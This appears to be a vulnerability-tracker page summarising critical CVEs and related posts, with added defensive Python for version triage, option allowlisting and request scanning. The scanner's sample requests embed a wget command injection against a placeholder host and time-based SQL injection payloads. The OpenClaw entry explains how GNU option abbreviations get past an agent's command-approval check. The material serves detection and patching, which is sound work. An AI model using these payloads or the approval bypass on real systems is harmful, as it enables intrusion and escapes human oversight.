
Overview

  • Cisco
  • Cisco Catalyst SD-WAN Manager

25 Feb 2026
Published
26 Feb 2026
Updated

CVSS v3.1
CRITICAL (10.0)
EPSS
2.19%

Description

A vulnerability in the peering authentication in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, and Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system. This vulnerability exists because the peering authentication mechanism in an affected system is not working properly. An attacker could exploit this vulnerability by sending crafted requests to an affected system. A successful exploit could allow the attacker to log in to an affected Cisco Catalyst SD-WAN Controller as an internal, high-privileged, non-root user account. Using this account, the attacker could access NETCONF, which would then allow the attacker to manipulate network configuration for the SD-WAN fabric. 

Statistics

  • 8 Posts

Last activity: 2 hours ago

Fediverse


Cisco SDWAN Controller vulnerability in the wild and at the network edge. CVE-2026-20127 by UAT-8616. Heads up. blog.talosintelligence.com/uat

  • 0
  • 0
  • 0
  • 22h ago

Bluesky

Cisco SD-WAN zero-day vulnerability CVE-2026-20127 exploited since 2023 for administrator access / Cisco SD-WAN Zero-Day CVE-2026-20127 Exploited Since 2023 for Admin Access #HackerNews (Feb 26) thehackernews.com/2026/02/cisc...
  • 0
  • 0
  • 0
  • 22h ago
The latest update for #ArcticWolf includes "CVE-2026-20127: Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability" and "Welcoming Sevco Security: Expanding the Aurora Platform with Visionary Exposure Management". #cybersecurity #infosec #networks https://opsmtrs.com/2ZFbaTl
  • 0
  • 0
  • 0
  • 14h ago
CISA and Partners Release Guidance for Ongoing Global Exploitation of Cisco SD-WAN Systems (CVE-2026-20127) #patchmanagement
  • 0
  • 0
  • 0
  • 11h ago
A critical Cisco Catalyst SD-WAN vulnerability (CVE-2026-20127) remained undetected for three years before attackers exploited it to bypass authentication, gain root access, and steal data through chained exploitation with older flaws.
  • 0
  • 0
  • 0
  • 3h ago
The latest update for #Foresiet includes "CVE-2026-20127: In-Depth Analysis of the Cisco Catalyst SD-WAN Authentication Bypass Vulnerability" and "Leaked Credentials: The Hidden Supply Chain Powering Modern Ransomware Attacks". #cybersecurity #infosec https://opsmtrs.com/3J3CMGz
  • 0
  • 0
  • 0
  • 2h ago
~Sophos~ CISA warns two Cisco SD-WAN vulnerabilities are actively exploited, allowing for authentication bypass and privilege escalation. - IOCs: CVE-2026-20127, CVE-2022-20775 - #CVE202620127 #Cisco #ThreatIntel
  • 0
  • 0
  • 0
  • 16h ago
The latest update for #CyCognito includes "Emerging Threat: Cisco Catalyst SD-WAN Authentication Bypass (CVE-2026-20127)" and "Emerging Threat – Dell RecoverPoint for VMs Hardcoded Credential (CVE-2026-22769)". #cybersecurity #AttackSurfaceManagement #EASM https://opsmtrs.com/44Srq0X
  • 0
  • 0
  • 0
  • 15h ago

Overview

  • Juniper Networks
  • Junos OS Evolved

25 Feb 2026
Published
26 Feb 2026
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
0.25%

KEV

Description

An Incorrect Permission Assignment for Critical Resource vulnerability in the On-Box Anomaly detection framework of Juniper Networks Junos OS Evolved on PTX Series allows an unauthenticated, network-based attacker to execute code as root. The On-Box Anomaly detection framework should only be reachable by other internal processes over the internal routing instance, but not over an externally exposed port. With the ability to access and manipulate the service to execute code as root a remote attacker can take complete control of the device. Please note that this service is enabled by default as no specific configuration is required. This issue affects Junos OS Evolved on PTX Series: 25.4 versions before 25.4R1-S1-EVO, 25.4R2-EVO. This issue does not affect Junos OS Evolved versions before 25.4R1-EVO. This issue does not affect Junos OS.
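Because the service is on by default, a configuration review cannot clear a PTX box; the release string is the only thing to check. The following is an added example (not Juniper's code or tooling) that applies the affected-version statement above literally to an inventory. The release-string grammar (optional build number after the R or S component, trailing -EVO), the inventory layout and the hostnames are assumptions made for the example; trains after 25.4 are not mentioned in the advisory and are reported as not affected rather than guessed at.

```python
import re
from typing import Dict, List, Tuple

# Release strings look like 25.4R1-EVO, 25.4R1.2-EVO, 25.4R1-S1-EVO, 21.4R3-S4.10-EVO.
# Build numbers after the R or S component are accepted but ignored for this check.
_JUNOS_RE = re.compile(
    r"^(?P<major>\d+)\.(?P<minor>\d+)"
    r"R(?P<r>\d+)(?:\.\d+)?"
    r"(?:-S(?P<s>\d+)(?:\.\d+)?)?"
    r"(?:-(?P<evo>EVO))?$",
    re.IGNORECASE,
)


def parse_junos_version(version: str) -> Tuple[int, int, int, int, bool]:
    """Return (major, minor, R, S, is_evolved); raise ValueError on anything else."""
    m = _JUNOS_RE.match(version.strip())
    if m is None:
        raise ValueError(f"unrecognised Junos release string: {version!r}")
    return (int(m["major"]), int(m["minor"]), int(m["r"]),
            int(m["s"]) if m["s"] else 0, m["evo"] is not None)


def is_affected_cve_2026_21902(version: str, platform: str = "PTX") -> bool:
    """Advisory text applied literally: Junos OS Evolved on PTX Series, 25.4
    releases before 25.4R1-S1-EVO / 25.4R2-EVO. Classic Junos OS, non-PTX
    platforms and trains before 25.4 are out of scope. Later trains are not
    listed in the advisory, so they return False here rather than a guess."""
    major, minor, r, s, evolved = parse_junos_version(version)
    if not evolved or not platform.upper().startswith("PTX"):
        return False
    if (major, minor) != (25, 4):
        return False
    # 25.4R1-EVO (any build) is affected; R1-S1 and R2 onwards carry the fix.
    return (r, s) < (1, 1)


def triage(inventory: List[Dict[str, str]]) -> Dict[str, str]:
    """Map hostname -> 'affected' | 'not affected' | 'unparseable'."""
    result: Dict[str, str] = {}
    for device in inventory:
        try:
            hit = is_affected_cve_2026_21902(device["version"], device["platform"])
        except ValueError:
            result[device["hostname"]] = "unparseable"
            continue
        result[device["hostname"]] = "affected" if hit else "not affected"
    return result


# Constructed inventory for the example; hostnames, platforms and versions are made up.
SAMPLE_INVENTORY = [
    {"hostname": "ptx-core-1", "platform": "PTX10008", "version": "25.4R1-EVO"},
    {"hostname": "ptx-core-2", "platform": "PTX10008", "version": "25.4R1.3-EVO"},
    {"hostname": "ptx-core-3", "platform": "PTX10008", "version": "25.4R1-S1-EVO"},
    {"hostname": "ptx-lab-1", "platform": "PTX10001", "version": "24.4R2-EVO"},
    {"hostname": "mx-edge-1", "platform": "MX480", "version": "25.4R1"},
    {"hostname": "ptx-lab-2", "platform": "PTX10001", "version": "unknown"},
]

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host:12s} {status}")
```

Devices that come back "unparseable" need a manual look rather than being silently dropped; a release string that does not match the grammar above is exactly the kind of record that hides an unpatched box.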

Statistics

  • 5 Posts
  • 4 Interactions

Last activity: 6 hours ago

Fediverse


Juniper Networks has released an update for its Junos OS Evolved to fix a critical vulnerability (CVE-2026-21902) affecting PTX series routers. This flaw, if exploited by an unauthenticated attacker, could allow for arbitrary code execution with root privileges, potentially giving an attacker complete control over the device.
securityweek.com/juniper-netwo

  • 1
  • 0
  • 0
  • 8h ago

The security issue is identified as CVE-2026-21902 and is caused by incorrect permission assignment in the ‘On-Box Anomaly Detection’ framework, which should be exposed to internal processes only over the internal routing interface. bleepingcomputer.com/news/security/critical-juniper-networks-ptx-flaw-allows-full-router-takeover/

  • 0
  • 0
  • 0
  • 6h ago

Bluesky

Junos OS Evolved: PTX Series: A vulnerability allows an unauthenticated, network-based attacker to execute code as root (CVE-2026-21902) URL: supportportal.juniper.net/s/article/20... Classification: Critical, Solution: Official Fix, Exploit Maturity: Unproven, CVSSv4.0: 9.3
  • 1
  • 0
  • 0
  • 12h ago
Juniper Networks released an emergency patch for CVE-2026-21902, a critical vulnerability in Junos OS Evolved that allows unauthenticated remote attackers to execute arbitrary code with root privileges on PTX routers.
  • 1
  • 0
  • 0
  • 9h ago
The security issue is identified as CVE-2026-21902 and is caused by incorrect permission assignment in the ‘On-Box Anomaly Detection’ framework. bleepingcomputer.com/news/security/critical-juniper-networks-ptx-flaw-allows-full-router-takeover/
  • 1
  • 0
  • 0
  • 6h ago

Overview

  • Ivanti
  • Connect Secure

08 Jan 2025
Published
21 Oct 2025
Updated

CVSS v3.1
CRITICAL (9.0)
EPSS
94.12%

Description

A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.

Statistics

  • 2 Posts
  • 2 Interactions

Last activity: 2 hours ago

Fediverse


"CISA warns that RESURGE malware can be dormant on Ivanti devices"

"[...] Cybersecurity and Infrastructure Security Agency (CISA) has released new details about RESURGE, a malicious implant used in zero-day attacks exploiting CVE-2025-0282 to breach Ivanti Connect Secure devices. The U.S."

bleepingcomputer.com/news/secu

  • 0
  • 0
  • 0
  • 2h ago

Bluesky

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released new details about RESURGE, a malicious implant used in zero-day attacks exploiting CVE-2025-0282 to breach Ivanti Connect Secure devices.
  • 0
  • 2
  • 0
  • 4h ago

Overview

  • Apache Software Foundation
  • Apache Log4j2

10 Dec 2021
Published
21 Oct 2025
Updated

CVSS
Pending
EPSS
94.36%

Description

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Statistics

  • 2 Posts

Last activity: 11 hours ago

Fediverse


SENTINEL BRIEF: Log4Shell (CVE-2021-44228) is an architectural failure, not just a bug. Our V7.4 Forensic Analysis explores the JNDI lookup logic failure that subverts Zero Trust topology. Moving beyond the patch to topological defense. Read the full report at The Cyber Mind Co.

thecybermind.co/2026/02/26/log

  • 0
  • 0
  • 0
  • 22h ago

Bluesky

Hunters, Load Your Queries: The Log4J Icon Hash That Exposes Vulnerable Systems + Video Introduction: The infamous Log4Shell vulnerability (CVE-2021-44228) remains a persistent threat years after its disclosure, with unpatched systems still scattered across the internet. Security researchers and…
  • 0
  • 0
  • 0
  • 11h ago

Overview

  • OpenClaw
  • OpenClaw

27 Feb 2026
Published
27 Feb 2026
Updated

CVSS v3.1
CRITICAL (9.9)
EPSS
0.08%

KEV

Description

In OpenClaw before 2026.2.23, tools.exec.safeBins validation for sort could be bypassed via GNU long-option abbreviations (such as --compress-prog) in allowlist mode, leading to approval-free execution paths that were intended to require approval. Only an exact string such as --compress-program was denied.
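The root cause is a property of GNU getopt_long, not of OpenClaw alone: any unambiguous prefix of a long option is accepted, and `--opt=value` is a valid spelling, so an exact-string denylist for `--compress-program` is defeated by `--compress-prog` or `--compress-program=sh`. The following is an added example, not OpenClaw's code, showing the exact-match check beside two hardened forms: a denylist that expands abbreviations the way getopt_long does, and the allowlist shape an approval-free path should take. The option list is a subset of `sort --help` assembled for the example, and which options count as dangerous or safe is a policy assumption; the page names only `--compress-program`.

```python
from typing import Iterable, List, Optional, Set

# Subset of GNU coreutils sort long options, constructed for this example; enough
# to exercise getopt_long's unique-prefix and ambiguity rules.
SORT_LONG_OPTIONS: List[str] = [
    "--batch-size", "--buffer-size", "--check", "--compress-program", "--debug",
    "--field-separator", "--files0-from", "--key", "--merge", "--numeric-sort",
    "--output", "--parallel", "--random-source", "--reverse", "--stable",
    "--temporary-directory", "--unique", "--zero-terminated", "--help", "--version",
]

# Policy assumption: the option the page names, which makes sort exec a program.
DANGEROUS_OPTIONS: Set[str] = {"--compress-program"}


def expand_long_option(arg: str, known: Iterable[str]) -> Optional[str]:
    """Resolve a long option the way getopt_long(3) does: drop '=value', take an
    exact match first, otherwise accept a unique prefix. Return None when the
    spelling is unknown or ambiguous (getopt would reject the command line)."""
    if not arg.startswith("--") or arg == "--":
        return None
    name = arg.split("=", 1)[0]
    options = list(known)
    if name in options:
        return name
    candidates = [opt for opt in options if opt.startswith(name)]
    return candidates[0] if len(candidates) == 1 else None


def naive_is_denied(arg: str) -> bool:
    """The exact-string check the description attributes to OpenClaw before
    2026.2.23: one spelling is caught, every other spelling goes through."""
    return arg == "--compress-program"


def hardened_is_denied(arg: str) -> bool:
    """Deny whatever getopt_long would expand to a dangerous option, and also any
    argument that is a prefix of one even while ambiguous, since a later coreutils
    release could make that abbreviation unique."""
    if expand_long_option(arg, SORT_LONG_OPTIONS) in DANGEROUS_OPTIONS:
        return True
    name = arg.split("=", 1)[0]
    return (len(name) > 2 and name.startswith("--")
            and any(opt.startswith(name) for opt in DANGEROUS_OPTIONS))


# Allowlist form: only options explicitly judged harmless skip review.
# Policy assumption for the example.
SAFE_OPTIONS: Set[str] = {"--reverse", "--numeric-sort", "--unique", "--key",
                          "--stable", "--field-separator", "--zero-terminated"}


def needs_approval(argv: List[str]) -> bool:
    """True unless every option in a sort command line expands to a safe option.
    Short options and the bare '--' are not modelled, so they also force approval."""
    for arg in argv[1:]:
        if arg.startswith("--"):
            if expand_long_option(arg, SORT_LONG_OPTIONS) not in SAFE_OPTIONS:
                return True
        elif arg.startswith("-") and arg != "-":   # '-' alone means stdin
            return True
    return False


if __name__ == "__main__":
    for candidate in ["--compress-program", "--compress-prog", "--compress-program=sh", "--c"]:
        print(f"{candidate:24s} naive={naive_is_denied(candidate)} hardened={hardened_is_denied(candidate)}")
```

Of the two hardened forms, the allowlist is the one to ship: a denylist has to anticipate every spelling getopt accepts, while an allowlist only has to name the spellings the policy has reviewed, and any abbreviation it has not seen falls back to approval.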

Statistics

  • 2 Posts

Last activity: Last hour

Fediverse


another day another critical vulnerability in openclaw 🥲🤡

"In OpenClaw before 2026.2.23, tools.exec.safeBins validation for sort could be bypassed via GNU long-option abbreviations (such as --compress-prog) in allowlist mode, leading to approval-free execution paths that were intended to require approval."

🔐 CVE-2026-28363

📊 CVSS: 9.9 · Critical
📅 02/27/2026, 04:16 AM
🛡️ CWE: CWE-184
📦 Affected: OpenClaw OpenClaw (< 2026.2.23)

🔗 hecate.pw/vulnerability/CVE-20

#cve #vulnerability #hecate

  • 0
  • 0
  • 0
  • 11h ago

Bluesky

📌 CVE-2026-28363 - In OpenClaw before 2026.2.23, tools.exec.safeBins validation for sort could be bypassed via GNU long-option abbreviations (such as --compress-prog) in... https://www.cyberhub.blog/cves/CVE-2026-28363
  • 0
  • 0
  • 0
  • Last hour

Overview

  • Totolink
  • N300RH

27 Feb 2026
Published
27 Feb 2026
Updated

CVSS v4.0
CRITICAL (9.3)
EPSS
0.89%

KEV

Description

A security flaw has been discovered in Totolink N300RH 6.1c.1353_B20190305. Affected by this vulnerability is the function setWebWlanIdx of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Performing a manipulation of the argument webWlanIdx results in OS command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks.

Statistics

  • 2 Posts

Last activity: 3 hours ago

Fediverse


⚠️ CRITICAL OS command injection in Totolink N300RH (v6.1c.1353_B20190305) — CVE-2026-3301. Unauthenticated remote exploit possible, with public exploit code out. Restrict access & monitor until patch released. radar.offseq.com/threat/cve-20

  • 0
  • 0
  • 0
  • 14h ago

Bluesky

📌 CVE-2026-3301 - A security flaw has been discovered in Totolink N300RH 6.1c.1353_B20190305. Affected by this vulnerability is the function setWebWlanIdx of the file /... https://www.cyberhub.blog/cves/CVE-2026-3301
  • 0
  • 0
  • 0
  • 3h ago

Overview

  • xz
  • xz

29 Mar 2024
Published
20 Nov 2025
Updated

CVSS v3.1
CRITICAL (10.0)
EPSS
85.80%

KEV

Description

Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.

Statistics

  • 1 Post
  • 3 Interactions

Last activity: 20 hours ago

Fediverse


Veritasium covers the #xz compromise. This is well done. It starts off explaining open source. It explains encryption and compression. It explains software dependencies. It explains how the back door would have worked. Good watch.

#Backdoor #Veritasium #CVE #CVE20243094
youtu.be/aoag03mSuXQ

  • 1
  • 2
  • 0
  • 20h ago

Overview

  • Web-ofisi
  • Firma

22 Feb 2026
Published
25 Feb 2026
Updated

CVSS v4.0
HIGH (8.8)
EPSS
0.09%

KEV

Description

Web Ofisi Firma v13 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'oz' array parameter. Attackers can send GET requests to category pages with malicious 'oz[]' values using time-based blind SQL injection payloads to extract sensitive database information.

Statistics

  • 1 Post
  • 2 Interactions

Last activity: 19 hours ago

Bluesky

📌 CVE-2019-25457 - Web Ofisi Firma v13 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code... https://www.cyberhub.blog/cves/CVE-2019-25457
  • 0
  • 2
  • 0
  • 19h ago

Overview

  • openemr
  • openemr

25 Feb 2026
Published
26 Feb 2026
Updated

CVSS v3.1
HIGH (8.8)
EPSS
0.04%

KEV

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 8.0.0 contain a SQL injection vulnerability in prescription that can be exploited by authenticated attackers. The vulnerability exists due to insufficient input validation in the prescription listing functionality. Version 8.0.0 fixes the vulnerability.

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 4 hours ago

Bluesky

📌 CVE-2026-25746 - OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 8.0.0 contain a SQL injecti... https://www.cyberhub.blog/cves/CVE-2026-25746
  • 0
  • 1
  • 0
  • 4h ago

Overview

  • Web-ofisi
  • Emlak

22 Feb 2026
Published
25 Feb 2026
Updated

CVSS v4.0
HIGH (8.8)
EPSS
0.11%

KEV

Description

Web Ofisi Emlak v2 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'ara' GET parameter. Attackers can send requests with time-based SQL injection payloads to extract sensitive database information or cause denial of service.
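Three of the entries on this page name the exact parameter that carries the injection: webWlanIdx for the Totolink N300RH command injection (CVE-2026-3301), the 'oz[]' array for Web Ofisi Firma (CVE-2019-25457) and 'ara' for Web Ofisi Emlak (CVE-2019-25456). That is enough to write a request-level check that a practitioner would put in front of these endpoints, or run over captured traffic, while waiting for a fix. The following is an added example, not vendor code: an allowlist for the interface index (a small integer and nothing else) and a time-based SQL injection pattern for the two search parameters, applied to constructed request records. The record shape, the page paths for the Web Ofisi sites, and the assumption that webWlanIdx arrives as a form or query parameter are all made for the example; the page does not state how cstecgi.cgi receives it.

```python
import re
from typing import Callable, Dict, Iterable, List, Optional, Tuple
from urllib.parse import parse_qs

# Characters that let a value break out of a shell command string.
SHELL_META = re.compile(r"[;&|`$(){}<>\\\n]")
# Time-based blind SQL injection primitives for the common engines.
SQL_TIME_BASED = re.compile(r"(?i)\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b")
# A quote followed later by a comment opener is the usual way to close off the rest of a query.
SQL_BREAKOUT = re.compile(r"""['"].*?(?:--|#|/\*)""")


def check_web_wlan_idx(value: str) -> Optional[str]:
    """Allowlist for the Totolink parameter: a WLAN index is a small non-negative
    integer and nothing else (CVE-2026-3301)."""
    if value.isdigit() and len(value) <= 2:
        return None
    if SHELL_META.search(value):
        return "shell metacharacters in webWlanIdx (CVE-2026-3301 command injection pattern)"
    return "non-numeric webWlanIdx"


def check_sql_param(name: str) -> Callable[[str], Optional[str]]:
    """Build a checker for a query parameter that reaches a database query."""
    def check(value: str) -> Optional[str]:
        if SQL_TIME_BASED.search(value):
            return f"time-based SQL injection payload in {name}"
        if SQL_BREAKOUT.search(value):
            return f"quote-and-comment sequence in {name}"
        return None
    return check


# (path, or None for any path; parameter name) -> checker
RULES: Dict[Tuple[Optional[str], str], Callable[[str], Optional[str]]] = {
    ("/cgi-bin/cstecgi.cgi", "webWlanIdx"): check_web_wlan_idx,   # Totolink N300RH, CVE-2026-3301
    (None, "oz[]"): check_sql_param("oz[]"),                       # Web Ofisi Firma v13, CVE-2019-25457
    (None, "ara"): check_sql_param("ara"),                         # Web Ofisi Emlak v2, CVE-2019-25456
}


def scan_requests(requests: Iterable[dict]) -> List[Tuple[str, str, str]]:
    """(source address, path, reason) for every request that trips a rule."""
    hits: List[Tuple[str, str, str]] = []
    for req in requests:
        for (path, param), check in RULES.items():
            if path is not None and req["path"] != path:
                continue
            for value in req["params"].get(param, []):
                reason = check(value)
                if reason:
                    hits.append((req["src"], req["path"], reason))
    return hits


def request(src: str, path: str, query: str) -> dict:
    """Constructed request record; parse_qs yields {name: [values]} as a CGI runtime would."""
    return {"src": src, "path": path, "params": parse_qs(query, keep_blank_values=True)}


# Constructed sample traffic: documentation address ranges and made-up page paths.
SAMPLE_REQUESTS = [
    request("198.51.100.7", "/cgi-bin/cstecgi.cgi", "webWlanIdx=1"),
    request("198.51.100.7", "/cgi-bin/cstecgi.cgi", "webWlanIdx=1;wget%20http://203.0.113.5/x%20-O%20/tmp/x"),
    request("203.0.113.44", "/kategori", "oz[]=3&oz[]=3'%20AND%20SLEEP(5)--%20-"),
    request("203.0.113.44", "/emlak", "ara=villa"),
    request("203.0.113.45", "/emlak", "ara=villa'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20-"),
]

if __name__ == "__main__":
    for src, path, reason in scan_requests(SAMPLE_REQUESTS):
        print(src, path, reason)
```

The asymmetry between the two checkers is deliberate: the Totolink parameter has a small legitimate domain, so it gets an allowlist and the metacharacter pattern only labels the reason; the search parameters are free text, so they can only be screened for payload shapes, and a quiet attacker can still pace a blind injection below what any such pattern sees. Treat pattern hits as triage input, not as proof of absence.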

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 21 hours ago

Bluesky

📌 CVE-2019-25456 - Web Ofisi Emlak v2 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code ... https://www.cyberhub.blog/cves/CVE-2019-25456
  • 0
  • 1
  • 0
  • 21h ago
Showing 1 to 10 of 78 CVEs